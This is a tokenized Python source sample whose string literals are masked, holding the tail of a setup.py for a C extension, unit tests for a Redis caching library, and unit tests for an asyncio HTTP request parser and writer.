] . split ( ) <EOL> sys . argv . remove ( arg ) <EOL> if arg . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> CFLAGS = arg . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] . split ( ) <EOL> sys . argv . remove ( arg ) <EOL> tests_require = [ ] <EOL> if v < ( <NUM_LIT:3> , ) : <EOL> tests_require . extend ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if os . getenv ( '<STR_LIT>' ) and os . getenv ( '<STR_LIT>' ) and v [ <NUM_LIT:0> : <NUM_LIT:2> ] == ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> CFLAGS . extend ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> LFLAGS . append ( "<STR_LIT>" ) <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = """<STR_LIT>""" , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> platforms = [ '<STR_LIT>' ] , <EOL> ext_modules = [ <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> include_dirs = inc_dirs , <EOL> define_macros = def_macros , <EOL> sources = sources , <EOL> library_dirs = lib_dirs , <EOL> libraries = libs , <EOL> extra_link_args = LFLAGS , <EOL> extra_compile_args = CFLAGS <EOL> ) <EOL> ] , <EOL> cmdclass = { '<STR_LIT>' : BuildExtNumpyInc } , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> setup_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> tests_require = tests_require , <EOL> extras_require = dict ( <EOL> optional = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> test = tests_require <EOL> ) , <EOL> packages = find_packages ( ) , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> zip_safe = True <EOL> ) </s>
<s> from datetime import timedelta <EOL> from rediscache import SimpleCache , RedisConnect , cache_it , cache_it_json , CacheMissException , ExpiredKeyException , DoNotCache <EOL> from unittest import TestCase , main <EOL> import time <EOL> class ComplexNumber ( object ) : <EOL> def __init__ ( self , real , imag ) : <EOL> self . real = real <EOL> self . imag = imag <EOL> def __eq__ ( self , other ) : <EOL> return self . real == other . real and self . imag == other . imag <EOL> class SimpleCacheTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . c = SimpleCache ( <NUM_LIT:10> ) <EOL> self . assertIsNotNone ( self . c . connection ) <EOL> self . redis = RedisConnect ( ) . connect ( ) <EOL> def test_expire ( self ) : <EOL> quick_c = SimpleCache ( ) <EOL> quick_c . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" , expire = <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . assertRaises ( ExpiredKeyException , quick_c . get , "<STR_LIT:foo>" ) <EOL> quick_c . flush ( ) <EOL> quick_c . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" , expire = timedelta ( seconds = <NUM_LIT:1> ) ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . assertRaises ( ExpiredKeyException , quick_c . get , "<STR_LIT:foo>" ) <EOL> quick_c . flush ( ) <EOL> def test_miss ( self ) : <EOL> self . assertRaises ( CacheMissException , self . c . get , "<STR_LIT>" ) <EOL> def test_kwargs_decorator ( self ) : <EOL> @ cache_it_json ( cache = self . c ) <EOL> def add_it ( a , b = <NUM_LIT:10> , c = <NUM_LIT:5> ) : <EOL> return a + b + c <EOL> add_it ( <NUM_LIT:3> ) <EOL> self . assertEqual ( add_it ( <NUM_LIT:3> ) , <NUM_LIT> ) <EOL> add_it ( <NUM_LIT:5> , b = <NUM_LIT:7> ) <EOL> self . assertEqual ( add_it ( <NUM_LIT:5> , b = <NUM_LIT:7> ) , <NUM_LIT> ) <EOL> add_it ( <NUM_LIT:6> , c = <NUM_LIT:3> ) <EOL> self . assertEqual ( add_it ( <NUM_LIT:6> , c = <NUM_LIT:3> ) , <NUM_LIT> ) <EOL> def test_store_retrieve ( self ) : <EOL> self . c . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> foo = self . c . get ( "<STR_LIT:foo>" ) <EOL> self . assertEqual ( foo , "<STR_LIT:bar>" ) <EOL> def test_json ( self ) : <EOL> payload = { "<STR_LIT>" : "<STR_LIT:data>" } <EOL> self . c . store_json ( "<STR_LIT>" , payload ) <EOL> self . assertEqual ( self . c . get_json ( "<STR_LIT>" ) , payload ) <EOL> def test_pickle ( self ) : <EOL> payload = ComplexNumber ( <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> self . c . store_pickle ( "<STR_LIT>" , payload ) <EOL> self . assertEqual ( self . c . get_pickle ( "<STR_LIT>" ) , payload ) <EOL> def test_decorator ( self ) : <EOL> self . redis . flushall ( ) <EOL> mutable = [ ] <EOL> @ cache_it ( cache = self . c ) <EOL> def append ( n ) : <EOL> mutable . append ( n ) <EOL> return mutable <EOL> append ( <NUM_LIT:1> ) <EOL> len_before = len ( mutable ) <EOL> mutable_cached = append ( <NUM_LIT:1> ) <EOL> len_after = len ( mutable ) <EOL> self . assertEqual ( len_before , len_after ) <EOL> self . assertNotEqual ( id ( mutable ) , id ( mutable_cached ) ) <EOL> self . assertEqual ( mutable , mutable_cached ) <EOL> def test_decorator_do_not_cache ( self ) : <EOL> @ cache_it ( cache = self . c ) <EOL> def test_no_cache ( n ) : <EOL> result = n * <NUM_LIT:10> <EOL> raise DoNotCache ( result ) <EOL> keys_before = len ( self . c . keys ( ) ) <EOL> r1 = test_no_cache ( <NUM_LIT:20> ) <EOL> r2 = test_no_cache ( <NUM_LIT:10> ) <EOL> r3 = test_no_cache ( <NUM_LIT:30> ) <EOL> r4 = test_no_cache ( <NUM_LIT:20> ) <EOL> self . assertEqual ( r1 , ( <NUM_LIT:10> * <NUM_LIT:20> ) ) <EOL> self . assertEqual ( r2 , ( <NUM_LIT:10> * <NUM_LIT:10> ) ) <EOL> self . assertEqual ( r3 , ( <NUM_LIT:10> * <NUM_LIT:30> ) ) <EOL> self . assertEqual ( r4 , ( <NUM_LIT:10> * <NUM_LIT:20> ) ) <EOL> keys_after = len ( self . c . keys ( ) ) <EOL> self . assertEqual ( keys_before , keys_after ) <EOL> def test_decorator_do_not_cache_reraised ( self ) : <EOL> @ cache_it ( cache = self . c ) <EOL> def test_no_cache ( n ) : <EOL> result = n * <NUM_LIT:10> <EOL> try : <EOL> raise DoNotCache ( result ) <EOL> except DoNotCache as e : <EOL> raise e <EOL> except Exception : <EOL> pass <EOL> keys_before = len ( self . c . keys ( ) ) <EOL> r1 = test_no_cache ( <NUM_LIT:20> ) <EOL> r2 = test_no_cache ( <NUM_LIT:10> ) <EOL> r3 = test_no_cache ( <NUM_LIT:30> ) <EOL> r4 = test_no_cache ( <NUM_LIT:20> ) <EOL> self . assertEqual ( r1 , ( <NUM_LIT:10> * <NUM_LIT:20> ) ) <EOL> self . assertEqual ( r4 , ( <NUM_LIT:10> * <NUM_LIT:20> ) ) <EOL> self . assertEqual ( r2 , ( <NUM_LIT:10> * <NUM_LIT:10> ) ) <EOL> self . assertEqual ( r3 , ( <NUM_LIT:10> * <NUM_LIT:30> ) ) <EOL> keys_after = len ( self . c . keys ( ) ) <EOL> self . assertEqual ( keys_before , keys_after ) <EOL> def test_decorator_do_not_cache_wrapping_exception ( self ) : <EOL> @ cache_it ( cache = self . c ) <EOL> def test_no_cache ( n ) : <EOL> try : <EOL> result = n / <NUM_LIT:0> <EOL> except ZeroDivisionError as e : <EOL> raise DoNotCache ( e ) <EOL> keys_before = len ( self . c . keys ( ) ) <EOL> r1 = test_no_cache ( <NUM_LIT:20> ) <EOL> self . assertTrue ( isinstance ( r1 , ZeroDivisionError ) ) <EOL> keys_after = len ( self . c . keys ( ) ) <EOL> self . assertEqual ( keys_before , keys_after ) <EOL> def test_decorator_json ( self ) : <EOL> import random <EOL> mutable = { } <EOL> @ cache_it_json ( cache = self . c ) <EOL> def set_key ( n ) : <EOL> mutable [ str ( random . random ( ) ) ] = n <EOL> return mutable <EOL> set_key ( '<STR_LIT:a>' ) <EOL> len_before = len ( mutable ) <EOL> mutable_cached = set_key ( '<STR_LIT:a>' ) <EOL> len_after = len ( mutable ) <EOL> self . assertEqual ( len_before , len_after ) <EOL> self . assertNotEqual ( id ( mutable ) , id ( mutable_cached ) ) <EOL> self . assertEqual ( mutable , mutable_cached ) <EOL> def test_decorator_complex_type ( self ) : <EOL> import math <EOL> @ cache_it ( cache = self . c ) <EOL> def add ( x , y ) : <EOL> return ComplexNumber ( x . real + y . real , x . imag + y . imag ) <EOL> result = add ( ComplexNumber ( <NUM_LIT:3> , <NUM_LIT:4> ) , ComplexNumber ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> result_cached = add ( ComplexNumber ( <NUM_LIT:3> , <NUM_LIT:4> ) , ComplexNumber ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> self . assertNotEqual ( id ( result ) , id ( result_cached ) ) <EOL> self . assertEqual ( result , result_cached ) <EOL> self . assertEqual ( result , complex ( <NUM_LIT:3> , <NUM_LIT:4> ) + complex ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> def test_cache_limit ( self ) : <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . c . store ( "<STR_LIT>" % i , "<STR_LIT>" ) <EOL> self . failUnless ( len ( self . c ) <= <NUM_LIT:10> ) <EOL> self . failUnless ( len ( self . c . keys ( ) ) <= <NUM_LIT:10> ) <EOL> def test_flush ( self ) : <EOL> connection = self . c . connection <EOL> connection . set ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> self . c . store ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> len_before = len ( self . c ) <EOL> len_keys_before = len ( connection . keys ( self . c . make_key ( "<STR_LIT:*>" ) ) ) <EOL> self . c . flush ( ) <EOL> len_after = len ( self . c ) <EOL> len_keys_after = connection . get ( "<STR_LIT>" ) <EOL> self . assertTrue ( len_before > <NUM_LIT:0> ) <EOL> self . assertEqual ( len_after , <NUM_LIT:0> ) <EOL> self . assertTrue ( len_keys_before > <NUM_LIT:0> ) <EOL> self . assertEqual ( len_keys_after , '<STR_LIT>' ) <EOL> self . assertEqual ( connection . get ( "<STR_LIT>" ) , '<STR_LIT>' ) <EOL> connection . delete ( "<STR_LIT>" ) <EOL> def test_flush_namespace ( self ) : <EOL> self . redis . flushall ( ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> len_keys_before = len ( self . c . keys ( ) ) <EOL> self . c . flush_namespace ( '<STR_LIT:foo>' ) <EOL> len_keys_after = len ( self . c . keys ( ) ) <EOL> self . assertEqual ( ( len_keys_before - len_keys_after ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( self . c . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertRaises ( CacheMissException , self . c . get , "<STR_LIT>" ) <EOL> self . assertRaises ( CacheMissException , self . c . get , "<STR_LIT>" ) <EOL> self . c . flush ( ) <EOL> def test_flush_multiple ( self ) : <EOL> c1 = SimpleCache ( <NUM_LIT:10> , namespace = __name__ ) <EOL> c2 = SimpleCache ( <NUM_LIT:10> ) <EOL> c1 . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> c2 . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> c1 . flush ( ) <EOL> self . assertEqual ( len ( c1 ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( c2 ) , <NUM_LIT:1> ) <EOL> c2 . flush ( ) <EOL> def test_expire_all_in_set ( self ) : <EOL> self . c . store ( "<STR_LIT:foo>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( self . c . expire_all_in_set ( ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT:foo>" ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT>" ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT>" ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT:foo>" ) ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) ) <EOL> def test_expire_namespace ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( self . c . expire_namespace ( '<STR_LIT:foo>' ) , ( <NUM_LIT:3> , <NUM_LIT:2> ) ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT>" ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT>" ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) > <NUM_LIT:0> ) <EOL> self . c . flush ( ) <EOL> def test_mget ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT:a>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> d = self . c . mget ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT:a>" ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_mget_nonexistant_key ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT:b>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> d = self . c . mget ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT:b>" ) <EOL> self . assertTrue ( "<STR_LIT>" not in d ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_mget_expiry ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT:c>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" , expire = <NUM_LIT:1> ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> d = self . c . mget ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT:c>" ) <EOL> self . assertTrue ( "<STR_LIT>" not in d ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_mget_json ( self ) : <EOL> payload_a1 = { "<STR_LIT>" : "<STR_LIT>" } <EOL> payload_a2 = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . c . store_json ( "<STR_LIT>" , payload_a1 ) <EOL> self . c . store_json ( "<STR_LIT>" , payload_a2 ) <EOL> d = self . c . mget_json ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , payload_a1 ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , payload_a2 ) <EOL> def test_mget_json_nonexistant_key ( self ) : <EOL> payload_b1 = { "<STR_LIT>" : "<STR_LIT>" } <EOL> payload_b3 = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . c . store_json ( "<STR_LIT>" , payload_b1 ) <EOL> self . c . store_json ( "<STR_LIT>" , payload_b3 ) <EOL> d = self . c . mget_json ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , payload_b1 ) <EOL> self . assertTrue ( "<STR_LIT>" not in d ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , payload_b3 ) <EOL> def test_invalidate_key ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT:d>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . invalidate ( "<STR_LIT>" ) <EOL> d = self . c . mget ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT:d>" ) <EOL> self . assertTrue ( "<STR_LIT>" not in d ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def tearDown ( self ) : <EOL> self . c . flush ( ) <EOL> main ( ) </s>
<s> import gc <EOL> import unittest <EOL> import unittest . mock <EOL> import asyncio <EOL> import asyncio . test_utils <EOL> from vase . http import ( <EOL> HttpRequest , <EOL> HttpParser , <EOL> HttpWriter , <EOL> BadRequestException , <EOL> _FORM_URLENCODED , <EOL> ) <EOL> from vase . util import MultiDict <EOL> class RequestTests ( unittest . TestCase ) : <EOL> def _get_request ( self ) : <EOL> request = HttpRequest ( <EOL> method = "<STR_LIT:GET>" , <EOL> uri = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> extra = { '<STR_LIT>' : ( '<STR_LIT:127.0.0.1>' , '<STR_LIT>' ) } <EOL> ) <EOL> request . add_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> request . add_header ( '<STR_LIT>' , _FORM_URLENCODED ) <EOL> return request <EOL> def test_request ( self ) : <EOL> req = self . _get_request ( ) <EOL> self . assertEqual ( req . GET , MultiDict ( foo = [ '<STR_LIT:bar>' ] , baz = [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( req . GET , MultiDict ( foo = [ '<STR_LIT:bar>' ] , baz = [ '<STR_LIT>' ] ) ) <EOL> def test_has_form ( self ) : <EOL> req = self . _get_request ( ) <EOL> self . assertTrue ( req . _has_form ( ) ) <EOL> req . replace_header ( '<STR_LIT>' , '<STR_LIT:application/json>' ) <EOL> self . assertFalse ( req . _has_form ( ) ) <EOL> def test_cookies ( self ) : <EOL> req = self . _get_request ( ) <EOL> self . assertEqual ( req . COOKIES , { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( req . COOKIES , { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_maybe_init_post ( self ) : <EOL> req = self . _get_request ( ) <EOL> loop = asyncio . new_event_loop ( ) <EOL> stream = asyncio . StreamReader ( loop = loop ) <EOL> data = b'<STR_LIT>' <EOL> req . add_header ( '<STR_LIT>' , str ( len ( data ) ) ) <EOL> req . body = stream <EOL> task = asyncio . Task ( req . _maybe_init_post ( ) , loop = loop ) <EOL> def feed ( ) : <EOL> stream . feed_data ( b'<STR_LIT>' ) <EOL> stream . feed_eof ( ) <EOL> loop . call_soon ( feed ) <EOL> loop . run_until_complete ( task ) <EOL> self . assertEqual ( req . POST , MultiDict ( foo = [ '<STR_LIT:bar>' ] , baz = [ '<STR_LIT>' ] ) ) <EOL> req = self . _get_request ( ) <EOL> stream . _eof = False <EOL> task = asyncio . Task ( req . _maybe_init_post ( ) , loop = loop ) <EOL> def feed ( ) : <EOL> stream . feed_data ( b'<STR_LIT>' ) <EOL> stream . feed_eof ( ) <EOL> loop . call_soon ( feed ) <EOL> loop . run_until_complete ( task ) <EOL> req . replace_header ( '<STR_LIT>' , '<STR_LIT:application/json>' ) <EOL> req . body = stream <EOL> stream . _eof = False <EOL> task = asyncio . Task ( req . _maybe_init_post ( ) , loop = loop ) <EOL> loop . call_soon ( feed ) <EOL> loop . run_until_complete ( task ) <EOL> self . assertEqual ( req . POST , MultiDict ( ) ) <EOL> class HttpParserTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . loop = asyncio . new_event_loop ( ) <EOL> asyncio . set_event_loop ( None ) <EOL> def tearDown ( self ) : <EOL> asyncio . test_utils . run_briefly ( self . loop ) <EOL> self . loop . close ( ) <EOL> gc . collect ( ) <EOL> def test_eof ( self ) : <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_eof ( ) ) <EOL> req = self . loop . run_until_complete ( task ) <EOL> self . assertIs ( req , None ) <EOL> req = self . loop . run_until_complete ( task ) <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> def feed ( ) : <EOL> stream . feed_data ( b'<STR_LIT>' ) <EOL> stream . feed_eof ( ) <EOL> self . loop . call_soon ( feed ) <EOL> req = self . loop . run_until_complete ( task ) <EOL> self . assertIs ( req , None ) <EOL> def test_bad_version ( self ) : <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( b'<STR_LIT>' ) ) <EOL> self . assertRaises ( BadRequestException , self . loop . run_until_complete , task ) <EOL> def test_headers ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> self . assertEqual ( result . method , '<STR_LIT:GET>' ) <EOL> self . assertEqual ( result . path , '<STR_LIT:/>' ) <EOL> self . assertEqual ( result . version , '<STR_LIT>' ) <EOL> self . assertEqual ( result . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test_multiline_headers ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> self . assertEqual ( result . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( result . get ( '<STR_LIT:Content-Type>' ) , '<STR_LIT>' ) <EOL> def test_invalid_headers ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> self . assertRaises ( BadRequestException , self . loop . run_until_complete , task ) <EOL> def test_no_body ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> body = self . loop . run_until_complete ( asyncio . Task ( result . body . read ( ) , loop = self . loop ) ) <EOL> self . assertEqual ( body , b'<STR_LIT>' ) <EOL> def test_with_body ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> body = self . loop . run_until_complete ( asyncio . Task ( result . body . read ( ) , loop = self . loop ) ) <EOL> self . assertEqual ( body , b'<STR_LIT>' ) <EOL> def test_with_invalid_content_length ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> body = self . loop . run_until_complete ( asyncio . Task ( result . body . read ( ) , loop = self . loop ) ) <EOL> self . assertEqual ( body , b'<STR_LIT>' ) <EOL> class HttpWriterTests ( unittest . TestCase ) : <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_write_status ( self , write_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . status = <NUM_LIT:200> <EOL> self . assertFalse ( writer . _headers_sent ) <EOL> writer . flush ( ) <EOL> self . assertTrue ( writer . _headers_sent ) <EOL> write_method . assert_called_with ( b'<STR_LIT>' ) <EOL> def test_write_header_raises_when_headers_sent ( self ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . _headers_sent = True <EOL> self . assertRaises ( AssertionError , writer . __setitem__ , '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_write_header ( self , write_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . status = <NUM_LIT:200> <EOL> writer [ '<STR_LIT:foo>' ] = '<STR_LIT:bar>' <EOL> writer . flush ( ) <EOL> write_method . assert_called_with ( b'<STR_LIT>' ) <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_write_headers ( self , write_header_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . add_headers ( ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) ) <EOL> write_header_method . assert_called_with ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> def test_status_written ( self ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> self . assertFalse ( writer . _headers_sent ) <EOL> writer . _status_written = self . _headers_sent = True <EOL> writer . restore ( ) <EOL> self . assertFalse ( writer . _headers_sent ) <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_maybe_finalize_headers ( self , write_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . _maybe_send_headers ( ) <EOL> write_method . assert_called_with ( b'<STR_LIT>' ) <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . _headers_sent = True <EOL> writer . _maybe_send_headers ( ) <EOL> self . assertTrue ( writer . _headers_sent ) <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_write_body ( self , write_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . write_body ( b'<STR_LIT:hello>' ) <EOL> self . assertTrue ( writer . _headers_sent ) <EOL> write_method . assert_called_with ( b'<STR_LIT:hello>' ) <EOL> def test_writelines ( self ) : <EOL> mtransport = unittest . mock . MagicMock ( ) <EOL> writer = HttpWriter ( mtransport , None , None , None ) <EOL> writer . writelines ( ( b'<STR_LIT>' , ) ) <EOL> self . assertTrue ( writer . _headers_sent ) <EOL> mtransport . writelines . assert_called_with ( ( b'<STR_LIT>' , ) ) </s>
